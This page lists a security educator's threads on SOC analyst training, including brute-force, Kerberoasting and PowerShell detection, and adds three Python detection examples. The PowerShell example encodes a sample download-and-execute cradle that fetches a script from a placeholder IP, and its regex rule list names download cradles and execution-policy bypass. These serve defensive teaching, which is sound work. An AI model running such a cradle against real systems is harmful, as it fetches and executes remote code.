Dr. Maik Ro ➡️🦋
☠️ inactive account ☠️ - Training the next generation of Hackers over at bsky / linkedin / youtube 🏴‍☠️💜
Jul 14 27 tweets 7 min read
How to set up effective computer interrogation 🖥️ 🔍 🕵️‍♀️ - a 🧵: Hey friends - in this thread we will walk through the setup of Zentral, which lets you query all your endpoints at once using only SQL

ready, set - GO: MAGIC 🪄✨
Jun 28 16 tweets 3 min read
If you work in Tech/IT/Security today everyone is talking about TeamViewer.

Wanna know what happened and how you can easily triage cases like this in the future as a SOC Analyst?

Allow me to share a 🧵: The TeamViewer application is used by IT professionals and by everyone who lives far away from home but still has to deal with their family's IT problems.

It allows you to log in remotely to any computer whose session information (the TeamViewer ID and password) has been shared with you.
Jun 18 28 tweets 7 min read
The easiest way to start with Cybersecurity: Imagine the following situation:

WOHOOOOOO - YOU WON 🥇🏆

You have your first day as the new security person.

Congratulations, this journey was not easy but you made it anyway! 🚀🎉
Feb 19 26 tweets 4 min read
Walkthrough 🚶🚶‍♀️🚶‍♂️ - What does all of this mean and why should I care?! In the last post I shared the screenshot above with you ⬆️

and wanted to know what you would do if you see this after an alert was triggered by a new account logging into one of the machines in your company network
Jan 25 26 tweets 6 min read
Day 2️⃣7️⃣

MITRE ATT&CK Framework for brainiacs 🧠 and other cyber stars🌟: Imagine you are a glorious SOC Analyst working on a beautiful new case after the following alert has been thrown:
Jan 15 33 tweets 7 min read
Day 2️⃣6️⃣

Detecting Brute Force attacks: Brute force attacks are a very common initial access and lateral movement vector because humans are inherently bad at remembering long, complex passwords.
💡 What is the difference between brute-force, password spraying and credential stuffing?
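To make the difference concrete, here is the distinction turned into detection logic, as an added example that is not code from the thread. It runs over a constructed list of Windows Security event 4625 (failed logon) records reduced to the fields a SIEM would extract. The aggregation window, the alert threshold and the "many unknown user names" heuristic for credential stuffing are assumptions for illustration; the sub-status codes 0xC000006A (bad password) and 0xC0000064 (user name does not exist) are the real 4625 values.

```python
"""Classify bursts of failed logons per source IP as brute force,
password spraying or credential stuffing (added example, not from the thread)."""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)   # assumed aggregation window
MIN_FAILURES = 8                 # assumed: fewer failures than this is not alerted on
UNKNOWN_USER_RATIO = 0.3         # assumed: share of non-existent accounts that smells like stuffing

BAD_PASSWORD = "0xC000006A"      # 4625 sub-status: wrong password
NO_SUCH_USER = "0xC0000064"      # 4625 sub-status: account does not exist


def _ev(minute, ip, user, status=BAD_PASSWORD):
    """Constructed 4625 record: (TimeCreated, IpAddress, TargetUserName, SubStatus)."""
    return (datetime(2024, 1, 15, 9, minute), ip, user, status)


# Constructed sample events covering the three patterns plus benign noise.
SAMPLE_4625 = (
    # 10.0.0.5 hammers one account with many passwords -> brute force
    [_ev(m, "10.0.0.5", "svc_backup") for m in range(0, 12)]
    # 10.0.0.9 tries one password against many accounts -> password spraying
    + [_ev(2, "10.0.0.9", f"user{i:02d}") for i in range(10)]
    # 203.0.113.7 replays leaked pairs; half the names do not exist here -> stuffing
    + [_ev(3 + i % 4, "203.0.113.7", f"leak{i}@corp.example",
           NO_SUCH_USER if i % 2 else BAD_PASSWORD) for i in range(10)]
    # a user fat-fingering the password twice -> below threshold, no verdict
    + [_ev(5, "10.0.0.20", "alice"), _ev(6, "10.0.0.20", "alice")]
)


def classify_sources(events, window=WINDOW, min_failures=MIN_FAILURES):
    """Return {source_ip: verdict} for sources whose recent failures exceed the threshold."""
    by_ip = defaultdict(list)
    for ts, ip, user, status in sorted(events):
        by_ip[ip].append((ts, user, status))

    verdicts = {}
    for ip, rows in by_ip.items():
        # keep only the failures inside `window` of this source's newest failure
        newest = rows[-1][0]
        recent = [r for r in rows if newest - r[0] <= window]
        if len(recent) < min_failures:
            continue

        attempts_per_user = defaultdict(int)
        unknown = 0
        for _, user, status in recent:
            attempts_per_user[user] += 1
            if status == NO_SUCH_USER:
                unknown += 1

        distinct_users = len(attempts_per_user)
        if distinct_users == 1:
            # many guesses, one victim: classic brute force
            verdicts[ip] = "brute force"
        elif unknown / len(recent) >= UNKNOWN_USER_RATIO:
            # leaked user/password pairs from elsewhere: many names do not exist here
            verdicts[ip] = "credential stuffing"
        elif len(recent) / distinct_users <= 2:
            # one or two guesses each against many accounts: spraying under lockout
            verdicts[ip] = "password spraying"
        else:
            verdicts[ip] = "mixed/unknown"
    return verdicts


if __name__ == "__main__":
    for ip, verdict in classify_sources(SAMPLE_4625).items():
        print(f"{ip:<14} {verdict}")
```

Grouping by source IP is the simplest cut; a spray spread across many source addresses only shows up when you also count distinct target accounts per time slice regardless of source, so a production rule needs both aggregations.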
Jan 11 31 tweets 6 min read
Day 2️⃣5️⃣

Detecting Network Behaviour of Hackers with IDS: We often want to detect attackers based on their actions,

and one tool that allows us to do just that is an Intrusion Detection System (IDS).

A network IDS is software that inspects network traffic at the packet level and compares it against predefined or custom rules (signatures), raising an alert on a match.
Jan 8 32 tweets 4 min read
Day 2️⃣4️⃣ - How the Windows Event Log System works: During the 30 Day Practical SOC Analyst Training you have set up your local SIEM to learn more about alerts & attack detection

wanna join?!
academy.maikroservice.com/p/30-day-soc-a…
Jan 5 31 tweets 9 min read
Linux Log Files and where to find them: First up - are you ready to become a full fledged cyber professional?

Maybe even a Security Analyst or Security Operations Center Analyst?

Good - I have just the thing for you - sign up now for the bootcamp waitlist at:
maikroservice.com/waitlist
Dec 30, 2023 24 tweets 8 min read
Day 2️⃣2️⃣
How to join Computers to your Domain - Windows & Linux: Wonderful, you made it.

I was hoping you would join me for Part II of "Your HomeLab AD Domain"

You did not see Part 1?!

Look here:
Dec 30, 2023 31 tweets 12 min read
Day 2️⃣1️⃣
How to set up AD in your HomeLab: Today we try something new - for the TLDR; folks,
have a look at the visual of the thread:

This way you can have a birds-eye view first on Pinterest and then come back for details once you are ready - I hope it helps.
pinterest.de/pin/1065171749…
Dec 28, 2023 50 tweets 13 min read
Day 2️⃣0️⃣ of Your 30 Day SOC Analyst Journey

How to detect Windows Attacks - Kerberoasting: Kerberoasting is one of the quickest ways for an attacker to obtain crackable material for service account passwords: they request service tickets and crack them offline to recover the passwords

It is based on a “feature” of Kerberos that allows any authenticated domain user to request a service ticket (TGS) for any account with an SPN from the domain controller, without knowing that account's password. The ticket is encrypted with the service account's password hash, so it can be cracked offline, and it is especially fast if the ticket uses RC4 (encryption type 0x17) instead of AES.
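The detection side of the “feature” above, as an added example that is not code from the thread: a requester asking for service tickets to many distinct service accounts in a short window, particularly with RC4, is the Kerberoasting footprint in Security event 4769. The input is a constructed set of 4769 records (TargetUserName, ServiceName, TicketEncryptionType); the window, the threshold and the sample account names are assumptions, while 0x17 (RC4-HMAC) and 0x12 (AES256) are the real TicketEncryptionType values.

```python
"""Flag Kerberoasting from Windows Security event 4769 records
(added example, not from the thread)."""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)      # assumed: roasting tools walk the SPN list in seconds
MIN_DISTINCT_SERVICES = 5          # assumed alert threshold
RC4_HMAC = "0x17"                  # TicketEncryptionType for RC4 (fast to crack)
AES256 = "0x12"                    # TicketEncryptionType for AES256


def _ev(second, requester, service, enc):
    """Constructed 4769 record: (TimeCreated, TargetUserName, ServiceName, TicketEncryptionType)."""
    return (datetime(2023, 12, 28, 14, 0, second), requester, service, enc)


# Constructed sample events: one roaster, one normal user, machine-account noise.
SAMPLE_4769 = [
    # jdoe pulls RC4 tickets for six different service accounts within 30 seconds
    *[_ev(10 + i, "jdoe", svc, RC4_HMAC) for i, svc in enumerate(
        ["svc_sql", "svc_web", "svc_backup", "svc_sccm", "svc_exchange", "svc_print"])],
    # alice opens two services during normal work, AES tickets
    _ev(15, "alice", "svc_fileshare", AES256),
    _ev(40, "alice", "svc_sql", AES256),
    # a workstation talking to another machine account (random password, not roastable)
    *[_ev(s, "WS01$", "WS02$", AES256) for s in range(0, 60, 10)],
    # krbtgt shows up in everyone's ticket traffic; it is not a roasting target here
    _ev(20, "jdoe", "krbtgt", AES256),
]


def detect_kerberoasting(events, window=WINDOW, min_services=MIN_DISTINCT_SERVICES):
    """Return {requester: {"distinct_services": n, "rc4_requests": k}} for suspicious requesters."""
    per_user = defaultdict(list)
    for ts, requester, service, enc in sorted(events):
        # machine accounts and krbtgt are not practical crack targets; drop them as noise
        if service.endswith("$") or service.lower() == "krbtgt":
            continue
        per_user[requester].append((ts, service, enc))

    hits = {}
    for requester, rows in per_user.items():
        start = 0
        for end in range(len(rows)):
            # slide the window start forward until the span fits inside `window`
            while rows[end][0] - rows[start][0] > window:
                start += 1
            span = rows[start:end + 1]
            services = {svc for _, svc, _ in span}
            if len(services) < min_services:
                continue
            rc4 = sum(1 for _, _, enc in span if enc == RC4_HMAC)
            best = hits.get(requester)
            if best is None or len(services) > best["distinct_services"]:
                hits[requester] = {"distinct_services": len(services), "rc4_requests": rc4}
    return hits


if __name__ == "__main__":
    for requester, info in detect_kerberoasting(SAMPLE_4769).items():
        print(f"{requester}: {info['distinct_services']} services, {info['rc4_requests']} RC4 tickets")
```

The RC4 count is worth surfacing on its own: in a domain where service accounts support AES, an RC4 ticket for one of them means the requester asked for the weaker encryption type, which is exactly what roasting tools do to keep cracking cheap.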
Dec 24, 2023 45 tweets 12 min read
Day 1️⃣9️⃣ of Your 30 Day SOC Analyst Journey

The Art of Memory Forensics explained for Beginners: Let’s continue our Story - shall we!?
Dec 23, 2023 28 tweets 10 min read
Day 1️⃣8️⃣ of Your 30 Day SOC Analyst Journey

How to analyze computer snapshots: To make sure we are all on the same page

Yesterday we learned how to create a snapshot of a potentially compromised machine:

Today we will use a snapshot from the internet just so that we are all on the same page.
Dec 20, 2023 18 tweets 6 min read
Day 1️⃣7️⃣ of Your 30 Day SOC Analyst Journey
How to get started with Digital Forensics: Digital Forensics, the stuff you always dreamed about since CSI Miami.

What is Digital Forensics, you ask?

Let me tell you a story.
Dec 20, 2023 38 tweets 11 min read
Day 1️⃣6️⃣ of Your 30 Day SOC Analyst Journey
How to write custom SIEM rules for PowerShell Commands: You want to hunt down attackers when they use the most powerful tool available on Windows systems?

You need to know how to write custom PowerShell detection rules to do just that - and it all starts with PowerShell logs.
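What such a rule looks like once the logs are flowing, as an added example that is not code from the thread: a small matcher over constructed PowerShell script block log entries (event 4104 ScriptBlockText) that also decodes `-EncodedCommand` payloads, since the interesting strings are usually hidden behind base64 of UTF-16LE. The rule patterns, the event texts and the hosts in them are assumptions for illustration; the UTF-16LE encoding of `-EncodedCommand` is how PowerShell actually does it.

```python
"""Match custom detection rules against PowerShell script block log text,
decoding -EncodedCommand first (added example, not from the thread)."""
import base64
import re

# Assumed starter rule set: name -> pattern. Real rule sets are far longer.
RULES = [
    ("encoded_command", re.compile(r"-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)),
    ("invoke_expression", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("download_cradle", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I)),
    ("execution_policy_bypass", re.compile(r"-ep\s+bypass|-ExecutionPolicy\s+bypass", re.I)),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
]


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload, or None if there is none / it is not valid."""
    match = RULES[0][1].search(text)
    if not match:
        return None
    try:
        # PowerShell base64-encodes the command as UTF-16LE, not UTF-8
        return base64.b64decode(match.group(2), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(script_block):
    """Return (sorted rule names that fired, decoded payload or None) for one log entry."""
    fired = {name for name, pattern in RULES if pattern.search(script_block)}
    decoded = decode_encoded_command(script_block)
    if decoded is not None:
        # re-run every rule over the decoded payload: that is where the cradle hides
        fired |= {name for name, pattern in RULES if pattern.search(decoded)}
    return sorted(fired), decoded


# Constructed sample 4104 entries (hostnames and paths are made up).
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()
SAMPLE_4104 = [
    "Get-ChildItem C:\\Users | Sort-Object LastWriteTime",
    f"powershell.exe -nop -w hidden -ep bypass -enc {ENCODED}",
    "Invoke-WebRequest -Uri https://intranet.corp.example/report.csv -OutFile report.csv",
]


if __name__ == "__main__":
    for entry in SAMPLE_4104:
        tags, decoded = analyze(entry)
        print(f"{entry[:60]:<60} -> {tags or 'clean'}")
        if decoded:
            print(f"    decoded: {decoded}")
```

The third sample entry fires `download_cradle` although it is an admin pulling a report from the intranet; that is the normal state of a fresh rule, and the tuning work (allowlisting known scripts, weighting several rules firing together higher than one alone) is where most of the effort in custom SIEM rules goes.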
Dec 19, 2023 36 tweets 11 min read
Day 1️⃣5️⃣ of Your 30 Day SOC Analyst Journey
Behavior-based detection 💙 - 10x better than signatures: Most of the people (55%) who read this have not yet followed @maikroservice -

If you learn something today - I would kindly ask you to smash that follow button so that I can make sure to produce high quality engaging content that teaches you new things regularly.

Thank you
Dec 17, 2023 29 tweets 10 min read
Day 1️⃣4️⃣ of Your SOC Analyst Journey

How to DELETE malware 🦠 automagically 🪄✨: Dear fellow cyber witches and wizards - today your initiation ceremony into the ranks of the high cyber council is commencing - I shall be your guide into the world of automagic

GO be a HERO!
Dec 16, 2023 28 tweets 9 min read
Day 1️⃣3️⃣ of Your SOC Analyst Journey

Automatic detection of malware: In the last threads we walked through

FIM - File Integrity Monitoring,
Signature-based detection via YARA
and your first detection rules
Dec 14, 2023 31 tweets 8 min read
Day 1️⃣2️⃣ of Your SOC Analyst Journey

📜 For Beginners - How to start using Signature-based Detection for Malware: 🚨 We are still in crisis-mode. 🚨

In the last threads we went through a simulated incident that snatched you off of your comfy 🛋️ and right into 🔥🧑‍🚒 fire extinguisher mode at your company
Dec 13, 2023 38 tweets 6 min read
Day 1️⃣1️⃣ of Your SOC Analyst Journey

How to use File Integrity Monitoring to detect hackers: Since we want to talk about File Integrity Monitoring we need to talk about Indicators of Compromise

Let's break down what “compromise” actually means, shall we?

We will look at two scenarios: